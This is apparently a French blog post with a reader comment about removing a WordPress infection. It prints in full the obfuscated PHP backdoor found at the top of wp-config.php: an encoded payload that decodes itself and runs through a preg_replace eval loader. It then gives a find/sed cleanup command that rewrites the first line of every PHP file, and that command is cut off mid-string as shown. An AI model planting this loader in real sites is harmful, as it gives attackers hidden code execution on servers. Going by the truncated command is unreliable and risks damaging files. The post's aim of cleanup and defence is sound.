Bonjour à tous,
Si comme moi, vous avez déjà eu quelques hacks sur wordpress et que vous voulez vous en débarrasser. VOici une petite astuce.
Pour commencer connectez vous en FTP et éditez le fichier wp-config.php (par exemple).
Si celui ci contient dès les premières lignes quelque chose du genre:
<?php if(!isset($GLOBALS["x61156x75156x61"])) { $ua=strtolower($_SERVER["x48124x54120x5f125x53105x52137x41107x45116x54"]); if ((! strstr($ua,"x6d163x69145")) and (! strstr($ua,"x72166x3a61x31"))) $GLOBALS["x61156x75156x61"]=1; } ?><?php $mtqvzubsmd = \'!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bddovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#j]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]2825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-8W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:5298u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fuzbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#24<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%2f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x782sut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c#-%x5c%x7825o:W%x5c%x7825c:>1<7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x7825%x5c%x7824-%x5c%x782x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOx5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5cM4P8]37]278]225]241]334]368]322]3]364]6]283]427825)}.;%x5c%x7860UQPMSVDc%x7825}&;ftmbg}%x5c%x787f;!osvufs}w25-#1]#-bubE{h%x5c%x7825)tpqsut>825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64ye]53Ld]53]Kc]55Ld]55#*<%x5c%x7mjgA%x5c%x7827doj%x5c%x78256-*f%x5c%x7825)sf%x5c%x7878pmpusutx7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;e%x5c%x78b%x5c%x7825825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%xc%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Db%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]2t0}Z;0]=]0#)2q%x5c%x7825l}S;2-5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%rror_reporting(0); preg_replace("%x2c%x7825V<#65,47R25,d7R17,67R37,#%x5c%bubE{h%x5c%x7825)sutcvt-#w#)ldbjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x78c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5x5c%x7827{ftmfV%x5c%f#<%x5c%x7825tdz>#L4]27c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#)sfebfI{*w%x5c%x7825)kV%c%x7825V<*#fopoV;hojepdoF.uofuopDf#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7787f;!|!}{;)gj}l;33bq}k;opjux787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAS5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x78259]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#])fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]2x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe%x786057ftbc%x5c%x787f!|!*uyf860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5cV<*w%x5c%x7825)ppde>u%x5g+)!gj+{e%x5c%x7825!osvufs!*!+A!>!1]y43]78]y33]65]y31]55]y85]82]y76]6B%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x78625w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEtpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%xy84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x7825;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)vt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bqov>*ofmy%x5c%x7825)utjm!|!*tutjyf%x5c%x7860opjudovg825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%%x5c%x7825-#1GO%x5c%x782ubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x78x61"]=1; function fjfgg($n){return chr(ord($n)-1);} @e9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39?]_%x5c%x785c}X%x5c%x78x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7x5c%x78256<C>^#zsfvr#%xhA%x5c%x7827pd%x5c%xftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpq155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%25s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x782]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85npd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-824-%x5c%x7824!>!tus%x5!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%5+*!*+fepdfe{h+{d%x5c%x7825)+opjudovdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x51%x72%164") && (!issw*[!%x5c%x7825rN}#QwTW%x5cf#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qpc%x785c%x5c%x7825j^%x5c%x78247825%x5c%x7824-%x5c%x799386c6f+9f5d816:+946:ce44#0QUUI&c_UOFHB%x5c%x7860SF7>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)ho}#-#%x5c%x7824-%x5c%x73]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x7825ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x782<%x5c%x787fw6*%x5c%x72]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y765-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6c%x7825%x5c%x7827jsv%]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x587f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x825kj:-!OVMM*<(<%x5c%x78e%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x525j:,,Bjg!)%x5c%x78255L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]K5:osvufs:~:<*9-1-r%x5c%x7825)s%x5cx7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y3%x5c%x7825)54l}%x5c%x7827;%x5c%j{fpg)%x5c%x7825s:*<%x5c%x785c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5csfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x787r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+pm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}FNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78r#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y3of>2bd%x5c%x7825!<5h%x5x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f75c%x78257-C)fepmqnjA%x5c%x7827&6<.fopo#>b%x5c%x7825!*##>>X)!gjZ<824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x785c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutch%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tj%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x785c%x787f;!opjudovg}k~~7824-tusqpt)%x5c%x7825z-#:#*%x5c%x75c%x785cq%x5c%x78257**^#zsfvet($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%4!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=t#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%xif((function_exists("%x6f%142%x5f%163%x74%14TV%x5c%x7860QUUI&b%x5c%x7825!|]y3e]81#%x5c%x782f#7e:55946-t]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**19x5c%x7825tdz)%x5c%x7825bbT-%x78256<C%x5c%x7827pd%x5c%x78256|6TQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bc%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985825<#g6R85,67R37,18R#>q%x5K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x%x7825eN+#Qi%x5c%x785c1^W%x5c%825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827EzH,2W%x5c%x7825wN;#-Ez-1H*WCx5c%x7824-%x5c%x7824*<!%x5c%x5tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x782x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#x5c%x7825nfd)##Qtpz)#]341]88%166%x61%154%x28%151%x6d%160%x6c%157%x64]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s#B#-#T#-#E#-#G#-#H#-#I#-#K#-0ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c25}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%xhnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x2#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1f%50%x2e%52%x29%57%x65","%x65u%x5c%x7825!-#2#%x5c%x782f#%x5c%#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x78612)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7c%x7825)fnbozcYufhA%x5c%x78272qj%*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{h%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47)1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%mw)%x5c%x7825tww**WYsboepn)%x%x7860{66~6<&w6<%x5c%x78%x5c%x7825b:>%x5c%x787]36]373P6]36]73]83]238M7x7822)!gj}1~!<2p%x5c%x7825%x#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x57fw6*CW&)7gj6<*doj%x-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#%145%x28%141%x72%162%x61%171%x5f%c%x7824]y8%x5c%x78245c%x7825bss-%x5c%x7825r%x5c%x7878B%x57-2qj%x5c%x78257-K)udfoopx5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x78c%x7825)n%x5c%x7825-#+I#!-id%x5c%x7825)uqpuft%x5c%x7860msvd},c%x787f_*#ujojRk3%x5c%34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe)>5h%x5c%x7825!<*::::::-1111{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f/(.*)/epreg_replacelmuciwreta\'; $zlcmiavdjg = explode(chr((227-183)),\'7717,44,5241,20,7443,69,4222,54,2030,36,8943,29,8487,40,9676,33,4563,66,808,49,5762,63,4156,66,3239,36,499,60,621,36,3275,52,4434,20,7964,32,857,56,2496,63,8264,40,329,63,2134,48,657,51,7872,63,9766,25,5134,54,3705,70,5435,50,6822,45,9207,33,7045,52,9553,36,5869,21,4411,23,7415,28,6974,47,9004,58,8606,61,9455,24,9589,20,7097,35,1541,28,5625,21,5944,36,6291,63,3387,65,6934,40,6071,57,9920,22,1803,46,1602,63,6867,67,8118,48,1350,25,9883,37,5188,53,1375,36,3775,60,3925,24,9114,42,4454,66,3327,60,4520,43,708,62,1411,32,7321,37,142,67,2103,31,3897,28,7676,41,7220,41,3835,62,4037,70,8723,35,9525,28,2685,70,0,35,4013,24,8794,58,7021,24,2271,59,2451,45,9298,45,2797,51,10009,27,9062,52,6589,53,5695,67,392,66,1569,33,6758,64,5383,27,3513,60,3203,36,5410,25,7761,30,4973,53,7132,29,7626,50,1236,68,2971,29,3452,61,3000,46,5287,45,6461,31,8758,36,7358,22,4276,45,9240,58,4780,47,5561,64,5098,36,3134,34,10036,70,5054,44,2228,20,2650,35,3110,24,2066,37,4344,67,8092,26,2418,33,2393,25,9791,68,8667,56,2622,28,35,53,1938,30,8972,32,6242,49,4321,23,458,41,6415,46,2755,42,3643,62,4719,61,7820,52,8362,44,6208,34,9343,42,1085,55,9859,24,9156,51,1443,68,8527,51,770,38,8196,68,4107,49,8406,53,5890,54,1735,68,2182,46,5332,29,9609,67,5485,21,7380,35,4950,23,559,62,9709,20,4629,37,1016,69,8333,29,5980,58,5361,22,7161,59,994,22,7512,65,4827,55,3046,64,8166,30,2917,54,7996,49,6642,51,209,65,8304,29,5261,26,1178,58,7261,60,9426,29,9729,37,8045,47,274,55,5825,44,7791,29,6693,65,3573,70,1849,49,2248,23,6149,59,1511,30,3949,64,7935,29,1968,62,8459,28,1304,46,9500,25,2848,69,9942,67,9385,41,2330,63,913,30,7577,49,6492,28,6128,21,5026,28,9479,21,4666,53,6520,69,8893,50,1140,38,8852,41,1685,50,943,51,1665,20,4882,68,8578,28,2559,63,6038,33,1898,40,5506,55,6354,61,88,54,3168,35,5646,49\'); $spbumcxyfi=substr($mtqvzubsmd,(63915-53809),(21-14)); if (!function_exists(\'mwrhcidctz\')) { function mwrhcidctz($zebzhykwih, $hgkaxslrtf) { $tlbmjrizuh = NULL; for($gnyaudjggn=0;$gnyaudjggn<(sizeof($zebzhykwih)/2);$gnyaudjggn++) { $tlbmjrizuh .= substr($hgkaxslrtf, $zebzhykwih[($gnyaudjggn*2)],$zebzhykwih[($gnyaudjggn*2)+1]); } return $tlbmjrizuh; };} $cavsztcqlk="x2057x2a40x69155x69146x74171x75150x76170x2052x2f40x65166x61154x28163x74162x5f162x65160x6c141x63145x28143x68162x2850x3161x3655x3771x2951x2c40x63150x7250x2863x3960x2d62x3970x2951x2c40x6d167x72150x63151x64143x74172x2844x7a154x63155x69141x76144x6a147x2c44x6d164x71166x7a165x62163x6d144x2951x2973x2057x2a40x74171x77151x6b144x63170x63145x2052x2f40"; $rrfzgzfeho=substr($mtqvzubsmd,(54238-44125),(73-61)); $rrfzgzfeho($spbumcxyfi, $cavsztcqlk, NULL); $rrfzgzfeho=$cavsztcqlk; $rrfzgzfeho=(426-305); $mtqvzubsmd=$rrfzgzfeho-1; ?> Hack wordpress
vous l\’aurez deviné, votre wordpress est infecté.
Comment faire pour réparer ce problème ?
Et bien j\’ai une petite astuce qui consiste à se connecter en SSH, puis de se rendre à la racine de son site et lancer la commande:
find . -name "*.php" -exec sed -i \'1 s/.*/ Laissez mouliner un peu et une fois l\’opération terminée, rééditez votre wp-config.php et votre problème devrait être réglé.
Cela dit, je ne sais pas encore d\’ou provient le hack, n\’hésitez pas à commenter si vous avez plus d\’informations à propos de celui-ci.
Enjoy 😉
En général ce genre d’insertion se fait à partir des failles plugin ou plus grave : WordPress lui même pour trouver son origine : il faut checker les tentatives d’attaques sur les serveur :
go « access.log » et essayes de repérer des connexion du même ip vers plein de dossiers et plugin que tu n’as pas forcément.
Ces attaques tentent de repérer les failles d’upload ou des droits d’utilisateurs un peu « libertins ». La meilleur défense que j’ai trouvé c’est de mettre des htaccess un peu partout (dossier upload, config…) et bien sur limiter au maximum les chmod)